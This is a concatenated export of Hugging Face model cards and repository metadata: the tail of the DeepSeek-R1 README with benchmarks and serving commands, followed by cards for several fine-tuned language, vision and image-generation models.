| 45.3 | 16.0 | 49.6 | 32.9 | **61.7** | 53.3 | | Math | AIME 2024 (Pass@1) | 16.0 | 9.3 | 39.2 | 63.6 | 79.2 | **79.8** | | | MATH-500 (Pass@1) | 78.3 | 74.6 | 90.2 | 90.0 | 96.4 | **97.3** | | | CNMO 2024 (Pass@1) | 13.1 | 10.8 | 43.2 | 67.6 | - | **78.8** | | Chinese | CLUEWSC (EM) | 85.4 | 87.9 | 90.9 | 89.9 | - | **92.8** | | | C-Eval (EM) | 76.7 | 76.0 | 86.5 | 68.9 | - | **91.8** | | | C-SimpleQA (Correct) | 55.4 | 58.7 | **68.0** | 40.3 | - | 63.7 | </div> ### Distilled Model Evaluation <div align="center"> | Model | AIME 2024 pass@1 | AIME 2024 cons@64 | MATH-500 pass@1 | GPQA Diamond pass@1 | LiveCodeBench pass@1 | CodeForces rating | |------------------------------------------|------------------|-------------------|-----------------|----------------------|----------------------|-------------------| | GPT-4o-0513 | 9.3 | 13.4 | 74.6 | 49.9 | 32.9 | 759 | | Claude-3.5-Sonnet-1022 | 16.0 | 26.7 | 78.3 | 65.0 | 38.9 | 717 | | o1-mini | 63.6 | 80.0 | 90.0 | 60.0 | 53.8 | **1820** | | QwQ-32B-Preview | 44.0 | 60.0 | 90.6 | 54.5 | 41.9 | 1316 | | DeepSeek-R1-Distill-Qwen-1.5B | 28.9 | 52.7 | 83.9 | 33.8 | 16.9 | 954 | | DeepSeek-R1-Distill-Qwen-7B | 55.5 | 83.3 | 92.8 | 49.1 | 37.6 | 1189 | | DeepSeek-R1-Distill-Qwen-14B | 69.7 | 80.0 | 93.9 | 59.1 | 53.1 | 1481 | | DeepSeek-R1-Distill-Qwen-32B | **72.6** | 83.3 | 94.3 | 62.1 | 57.2 | 1691 | | DeepSeek-R1-Distill-Llama-8B | 50.4 | 80.0 | 89.1 | 49.0 | 39.6 | 1205 | | DeepSeek-R1-Distill-Llama-70B | 70.0 | **86.7** | **94.5** | **65.2** | **57.5** | 1633 | </div> ## 5. Chat Website & API Platform You can chat with DeepSeek-R1 on DeepSeek's official website: [chat.deepseek.com](https://chat.deepseek.com), and switch on the button "DeepThink" We also provide OpenAI-Compatible API at DeepSeek Platform: [platform.deepseek.com](https://platform.deepseek.com/) ## 6. How to Run Locally ### DeepSeek-R1 Models Please visit [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repo for more information about running DeepSeek-R1 locally. **NOTE: Hugging Face's Transformers has not been directly supported yet.** ### DeepSeek-R1-Distill Models DeepSeek-R1-Distill models can be utilized in the same manner as Qwen or Llama models. For instance, you can easily start a service using [vLLM](https://github.com/vllm-project/vllm): ```shell vllm serve deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --tensor-parallel-size 2 --max-model-len 32768 --enforce-eager ``` You can also easily start a service using [SGLang](https://github.com/sgl-project/sglang) ```bash python3 -m sglang.launch_server --model deepseek-ai/DeepSeek-R1-Distill-Qwen-32B --trust-remote-code --tp 2 ``` ### Usage Recommendations **We recommend adhering to the following configurations when utilizing the DeepSeek-R1 series models, including benchmarking, to achieve the expected performance:** 1. Set the temperature within the range of 0.5-0.7 (0.6 is recommended) to prevent endless repetitions or incoherent outputs. 2. **Avoid adding a system prompt; all instructions should be contained within the user prompt.** 3. For mathematical problems, it is advisable to include a directive in your prompt such as: "Please reason step by step, and put your final answer within \boxed{}." 4. When evaluating model performance, it is recommended to conduct multiple tests and average the results. 
Additionally, we have observed that the DeepSeek-R1 series models tend to bypass the thinking pattern (i.e., outputting "\<think\>\n\n\</think\>") when responding to certain queries, which can adversely affect the model's performance. **To ensure that the model engages in thorough reasoning, we recommend forcing the model to begin its response with "\<think\>\n" in every output.** ## 7. License This code repository and the model weights are licensed under the [MIT License](https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE). The DeepSeek-R1 series supports commercial use and allows any modifications and derivative works, including, but not limited to, distillation for training other LLMs. Please note that: - DeepSeek-R1-Distill-Qwen-1.5B, DeepSeek-R1-Distill-Qwen-7B, DeepSeek-R1-Distill-Qwen-14B and DeepSeek-R1-Distill-Qwen-32B are derived from the [Qwen-2.5 series](https://github.com/QwenLM/Qwen2.5), which are originally licensed under the [Apache 2.0 License](https://huggingface.co/Qwen/Qwen2.5-1.5B/blob/main/LICENSE), and are now fine-tuned with 800k samples curated with DeepSeek-R1. - DeepSeek-R1-Distill-Llama-8B is derived from Llama3.1-8B-Base and is originally licensed under the [llama3.1 license](https://huggingface.co/meta-llama/Llama-3.1-8B/blob/main/LICENSE). - DeepSeek-R1-Distill-Llama-70B is derived from Llama3.3-70B-Instruct and is originally licensed under the [llama3.3 license](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct/blob/main/LICENSE). ## 8. Citation ``` @misc{deepseekai2025deepseekr1incentivizingreasoningcapability, title={DeepSeek-R1: Incentivizing Reasoning Capability in LLMs via Reinforcement Learning}, author={DeepSeek-AI}, year={2025}, eprint={2501.12948}, archivePrefix={arXiv}, primaryClass={cs.CL}, url={https://arxiv.org/abs/2501.12948}, } ``` ## 9. Contact If you have any questions, please raise an issue or contact us at [[email protected]]([email protected]).
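Referring back to the thinking-pattern note in the usage recommendations above, the snippet below is a rough sketch of one way to force a distilled checkpoint to begin its reply with `<think>\n` using Hugging Face Transformers. The model id, prompt, and generation length are only examples, not an official recipe.

```python
# Rough sketch: force the model to begin its reply with "<think>\n" by appending it to the
# chat-templated prompt, so generation continues from inside the think block. Sampling
# settings follow the recommendations above; the question is just an example.
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "deepseek-ai/DeepSeek-R1-Distill-Qwen-7B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype="auto", device_map="auto")

messages = [{"role": "user", "content": "How many prime numbers are there below 20?"}]
prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
prompt += "<think>\n"  # enforce the thinking pattern at the start of the output

inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=1024, do_sample=True, temperature=0.6, top_p=0.95)
print(tokenizer.decode(outputs[0][inputs["input_ids"].shape[1]:], skip_special_tokens=True))
```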
RoyRoyRpy/test_fine-tuned-visionllama_1_epo1
RoyRoyRpy
2025-05-30T08:08:25Z
0
0
peft
[ "peft", "tensorboard", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:meta-llama/Llama-3.2-11B-Vision-Instruct", "base_model:adapter:meta-llama/Llama-3.2-11B-Vision-Instruct", "license:llama3.2", "region:us" ]
null
2025-05-30T08:07:50Z
--- library_name: peft license: llama3.2 base_model: meta-llama/Llama-3.2-11B-Vision-Instruct tags: - trl - sft - generated_from_trainer model-index: - name: test_fine-tuned-visionllama_1_epo1 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # test_fine-tuned-visionllama_1_epo1 This model is a fine-tuned version of [meta-llama/Llama-3.2-11B-Vision-Instruct](https://huggingface.co/meta-llama/Llama-3.2-11B-Vision-Instruct) on an unknown dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0002 - train_batch_size: 10 - eval_batch_size: 8 - seed: 42 - gradient_accumulation_steps: 8 - total_train_batch_size: 80 - optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08 - lr_scheduler_type: constant - lr_scheduler_warmup_ratio: 0.03 - num_epochs: 1 ### Training results ### Framework versions - PEFT 0.13.0 - Transformers 4.45.1 - Pytorch 2.4.0+cu121 - Datasets 3.0.1 - Tokenizers 0.20.3
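Since the usage sections above are left as "More information needed", the following is a speculative sketch of how a LoRA adapter trained with this setup is typically loaded on top of the base vision model for inference. It assumes access to the gated Llama 3.2 base weights; the image URL and the question are placeholders.

```python
# Speculative sketch: load the adapter from this repo on top of the base
# Llama-3.2-11B-Vision-Instruct model. Assumes access to the gated base weights;
# the image URL and the question are placeholders.
import requests
from PIL import Image
from peft import PeftModel
from transformers import AutoProcessor, MllamaForConditionalGeneration

base_id = "meta-llama/Llama-3.2-11B-Vision-Instruct"
adapter_id = "RoyRoyRpy/test_fine-tuned-visionllama_1_epo1"

processor = AutoProcessor.from_pretrained(base_id)
model = MllamaForConditionalGeneration.from_pretrained(base_id, torch_dtype="auto", device_map="auto")
model = PeftModel.from_pretrained(model, adapter_id)

image = Image.open(requests.get("https://example.com/sample.jpg", stream=True).raw)
messages = [{"role": "user", "content": [{"type": "image"}, {"type": "text", "text": "Describe this image."}]}]
prompt = processor.apply_chat_template(messages, add_generation_prompt=True)

inputs = processor(image, prompt, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=128)
print(processor.decode(output[0], skip_special_tokens=True))
```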
AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.9-lr1e-7
AmberYifan
2025-05-30T08:07:50Z
0
0
transformers
[ "transformers", "safetensors", "llama", "text-generation", "generated_from_trainer", "trl", "dpo", "conversational", "arxiv:2305.18290", "base_model:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF", "base_model:finetune:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T07:47:30Z
--- base_model: AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF library_name: transformers model_name: Llama-3.1-8B-sft-SPIN-gpt4o-beta0.9-lr1e-7 tags: - generated_from_trainer - trl - dpo licence: license --- # Model Card for Llama-3.1-8B-sft-SPIN-gpt4o-beta0.9-lr1e-7 This model is a fine-tuned version of [AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF](https://huggingface.co/AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.9-lr1e-7", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/yifanwang/huggingface/runs/orpuijpx) This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290). ### Framework versions - TRL: 0.12.2 - Transformers: 4.46.3 - Pytorch: 2.7.0 - Datasets: 3.6.0 - Tokenizers: 0.20.3 ## Citations Cite DPO as: ```bibtex @inproceedings{rafailov2023direct, title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}}, author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn}, year = 2023, booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023}, url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html}, editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
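The repository name suggests β = 0.9 and a learning rate of 1e-7. As a loose sketch only (not the authors' actual training script), a TRL DPO run with those values could look roughly like this, assuming a preference dataset with prompt/chosen/rejected columns; the dataset name and batch size are placeholders.

```python
# Loose sketch of a TRL DPO run with the hyperparameters implied by the model name
# (beta=0.9, lr=1e-7). The dataset name and batch size are placeholders, not the real setup.
from datasets import load_dataset
from transformers import AutoModelForCausalLM, AutoTokenizer
from trl import DPOConfig, DPOTrainer

base_id = "AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF"
model = AutoModelForCausalLM.from_pretrained(base_id, torch_dtype="auto")
tokenizer = AutoTokenizer.from_pretrained(base_id)

# Expected columns: "prompt", "chosen", "rejected"
train_dataset = load_dataset("your-org/your-preference-dataset", split="train")

args = DPOConfig(
    output_dir="Llama-3.1-8B-sft-SPIN-gpt4o-beta0.9-lr1e-7",
    beta=0.9,
    learning_rate=1e-7,
    per_device_train_batch_size=2,
)
trainer = DPOTrainer(model=model, args=args, train_dataset=train_dataset, processing_class=tokenizer)
trainer.train()
```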
giayphuyen/gemma-3-4b-it-sphinx-chatbot
giayphuyen
2025-05-30T08:04:44Z
85
0
transformers
[ "transformers", "safetensors", "unsloth", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T03:54:26Z
--- library_name: transformers tags: - unsloth --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
sinhac332/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-pensive_foraging_platypus
sinhac332
2025-05-30T08:04:37Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "rl-swarm", "grpo", "gensyn", "I am pensive foraging platypus", "unsloth", "trl", "arxiv:2402.03300", "base_model:Gensyn/Qwen2.5-1.5B-Instruct", "base_model:finetune:Gensyn/Qwen2.5-1.5B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-05-29T19:40:20Z
--- base_model: Gensyn/Qwen2.5-1.5B-Instruct library_name: transformers model_name: Qwen2.5-1.5B-Instruct-Gensyn-Swarm-pensive_foraging_platypus tags: - generated_from_trainer - rl-swarm - grpo - gensyn - I am pensive foraging platypus - unsloth - trl licence: license --- # Model Card for Qwen2.5-1.5B-Instruct-Gensyn-Swarm-pensive_foraging_platypus This model is a fine-tuned version of [Gensyn/Qwen2.5-1.5B-Instruct](https://huggingface.co/Gensyn/Qwen2.5-1.5B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="sinhac332/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-pensive_foraging_platypus", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.15.2 - Transformers: 4.48.2 - Pytorch: 2.5.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
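The card only states that GRPO was used, so below is a bare-bones sketch of a TRL GRPO loop in the spirit of the TRL quickstart; the toy length-based reward and the `trl-lib/tldr` dataset are placeholders standing in for the actual swarm reward and data.

```python
# Bare-bones sketch of a TRL GRPO run. The reward function and dataset are toy
# placeholders; the real Gensyn swarm training setup is not described in the card.
from datasets import load_dataset
from trl import GRPOConfig, GRPOTrainer

def reward_len(completions, **kwargs):
    # Toy reward: prefer completions close to 200 characters.
    return [-abs(200 - len(completion)) for completion in completions]

train_dataset = load_dataset("trl-lib/tldr", split="train")  # any dataset with a "prompt" column

args = GRPOConfig(output_dir="Qwen2.5-1.5B-Instruct-GRPO-sketch", logging_steps=10)
trainer = GRPOTrainer(
    model="Gensyn/Qwen2.5-1.5B-Instruct",
    reward_funcs=reward_len,
    args=args,
    train_dataset=train_dataset,
)
trainer.train()
```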
exala/db_slr_7.1u
exala
2025-05-30T08:04:11Z
0
0
transformers
[ "transformers", "safetensors", "distilbert", "text-classification", "arxiv:1910.09700", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-05-30T08:03:36Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Seanwang1221/Gaoyuanyuan_FLUX
Seanwang1221
2025-05-30T08:02:16Z
16
0
diffusers
[ "diffusers", "text-to-image", "lora", "template:diffusion-lora", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "region:us" ]
text-to-image
2025-05-29T13:59:44Z
--- tags: - text-to-image - lora - diffusers - template:diffusion-lora widget: - text: >- GYY, a woman wearing a (plaid pencil_dress), holding a purse, floral print, depth of field, night cityscape, 1girl, long hair, ulzzang-6500v1.1, (original: 1.2), (realistic: 1.3) , beautiful girl with beautiful details, extremely detailed eyes and face, eyes with beautiful details, absurd, incredibly absurd, huge file size, ultra detail, high resolution, ultra detailed, best quality, masterpiece, illustration, ultra detailed and beautiful, ultra detailed, CG, unity, 8k wallpaper, amazing, fine Detail, masterpiece, top quality, official art, extremely detailed CG unity 8k wallpaper, cinematic lighting, (perfect shiny skin:0.6), slim and smooth lines, (floating), (small breasts:1), earrings , pearl necklace output: url: images/Liblib_00455_.png - text: >- GYY, PH0383RG, In a captivating, high-definition close-up, the image showcases a striking woman with black hair cascading down her shoulders, her brown eyes sparkling with an intriguing gaze as they lock onto the viewer. The camera is angled slightly from below, emphasizing her chiseled jawline and full, luscious lips painted in a bold shade of red. She wears an exquisite Victorian-inspired outfit, complete with a corseted bodice adorned with intricate lace patterns and delicate pearls, and a long, flowing skirt that billows softly around her legs. A dazzling array of jewels and gemstones, including a large pendant necklace and a pair of matching earrings, accentuate her regal beauty. The scene is set in a dimly lit, opulent ballroom with grand chandeliers casting a warm, golden glow on the woman's elegant figure. The emotional tone of the image is one of confidence, allure, and an air of mystery that leaves the viewer captivated and spellbound. output: url: images/Liblib_00460_.png - text: >- GYY, Nikon Z7 II and a NIKKOR Z 50mm f,1girl, 20yo,(wearing a red cheongsam),(in london city),(RAW photo, best quality), (realistic, photo-realistic), masterpiece, an extremely delicate and beautiful, extremely detailed, 2k wallpaper, Amazing, finely detail, extremely detailed CG unity 8k wallpaper, ultra-detailed, highres, soft light, beautiful detailed girl, extremely detailed eyes and face, beautiful detailed nose, beautiful detailed eyes,cinematic lighting,perfect anatomy,(slim body),hair bun,(black hair),city lights at night,smiling output: url: images/Liblib_00470_.png - text: >- GYY, An upper body image of a beautiful young lady, wavy hair, bright brown eyes, and bold eyeliner. She has fake nails, and her lips are shiny and full. She wears helix piercing. The extreme realism focuses on her detailed skin, showing fine textures and natural highlights. 
The background is open area with Families flying kites in open city, Small groups of people playing instruments in parks Her outfit are Loose-fitting kaftan dress with intricate patterns and earthy tones Subtle skin pores and natural texture on the face and neck, Realistic light reflections on the surface of the eyes, Slightly raised veins visible under the skin on the neck, Subtle veins visible on the eyelids under certain lighting, Realistic reflection of light on the glossy lips, following their curvature, Soft reflections on the necklace, enhancing its metallic look, Soft shadows under the lower lip, enhancing depth and form, slight noise effect to add texture and realism to the image.a slight sheen of sweat or natural skin oil to areas like the forehead and nose.Apply subsurface scattering to the skin to simulate the way light penetrates and scatters within it, enhancing realism. taking a selfie, holding her hand out and smiling cheerfully, her lips open revealing her beautiful teeth and tongue output: url: images/Liblib_00477_.png base_model: black-forest-labs/FLUX.1-dev instance_prompt: GYY --- # Gao Yuanyuan 高圆圆 Flux <Gallery /> ## Model description https://cdn-uploads.huggingface.co/production/uploads/66dc28e2928613d3397f0bf8/OV3DPWvDqXFIqjcFxNqAl.mp4 ## Trigger words You should use `GYY` to trigger the image generation. ## Download model Weights for this model are available in Safetensors format. [Download](/Seanwang1221/Gaoyuanyuan_FLUX1/tree/main) them in the Files & versions tab.
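The card does not include loading code, so the snippet below is only an illustrative guess at the usual diffusers workflow for a FLUX LoRA like this one: load the FLUX.1-dev base, attach the adapter from this repository, and keep the `GYY` trigger word in the prompt. The adapter filename resolution, sampler settings, and prompt are assumptions, not documented behaviour of this repo.

```python
# Illustrative guess at using this LoRA with diffusers: FLUX.1-dev base + the adapter
# from this repo, with the "GYY" trigger word in the prompt. If the repo contains more
# than one .safetensors file, pass weight_name=... explicitly to load_lora_weights.
import torch
from diffusers import FluxPipeline

pipe = FluxPipeline.from_pretrained("black-forest-labs/FLUX.1-dev", torch_dtype=torch.bfloat16)
pipe.load_lora_weights("Seanwang1221/Gaoyuanyuan_FLUX")
pipe.enable_model_cpu_offload()  # helps on GPUs with limited VRAM

prompt = "GYY, a woman in a red cheongsam, night cityscape, cinematic lighting, ultra detailed"
image = pipe(prompt, num_inference_steps=28, guidance_scale=3.5).images[0]
image.save("gyy_example.png")
```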
Soughing/mlra_v2_alpha_2.0_beta_1.0_medium
Soughing
2025-05-30T08:02:00Z
40
0
null
[ "pytorch", "gpt2", "license:apache-2.0", "region:us" ]
null
2025-05-27T03:42:55Z
--- license: apache-2.0 ---
bhavinjawade/may23-gemma-4b-tq_sft_finetuned-model
bhavinjawade
2025-05-30T08:01:58Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:google/gemma-3-4b-it", "base_model:finetune:google/gemma-3-4b-it", "endpoints_compatible", "region:us" ]
null
2025-05-29T22:32:46Z
--- base_model: google/gemma-3-4b-it library_name: transformers model_name: may23-gemma-4b-tq_sft_finetuned-model tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for may23-gemma-4b-tq_sft_finetuned-model This model is a fine-tuned version of [google/gemma-3-4b-it](https://huggingface.co/google/gemma-3-4b-it). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="bhavinjawade/may23-gemma-4b-tq_sft_finetuned-model", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with SFT. ### Framework versions - TRL: 0.16.1 - Transformers: 4.50.0.dev0 - Pytorch: 2.6.0+cu124 - Datasets: 3.3.2 - Tokenizers: 0.21.0 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and 